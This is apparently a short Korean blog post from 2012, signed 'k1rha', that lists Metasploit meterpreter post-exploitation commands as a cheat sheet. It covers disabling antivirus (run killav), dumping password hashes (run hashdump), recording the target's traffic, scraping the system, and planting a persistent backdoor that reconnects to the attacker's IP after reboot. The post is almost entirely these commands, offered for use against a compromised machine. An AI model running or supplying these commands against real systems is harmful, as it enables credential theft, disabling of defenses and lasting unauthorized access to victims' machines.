2012.07.24 15:43

백신 소프트웨어 무력화

meterpreter > run killav   


시스템 패스워드 해시 값 얻기

run hashdump 



공격 대상 시스템의 전체 트래픽 살펴보기

meterpreter>run packetrecorder -i 1 



시스템 스크레이핑

run scraper 



백도어 만들기,

 시스템 재부팅된 이후에도 미터프리터가 수행 될 수 있게 미터프리터 에이전트를 삽입.

리버스 연결일 경우 공격자 시스템에 다시 접속하는 대상 시스템의 간격을 조정할수 있음


>run persistence -X -i 50 -p 443 -r [source_ip] 

X 옵션이 부팅시 다시시작하겠음 


Posted by k1rha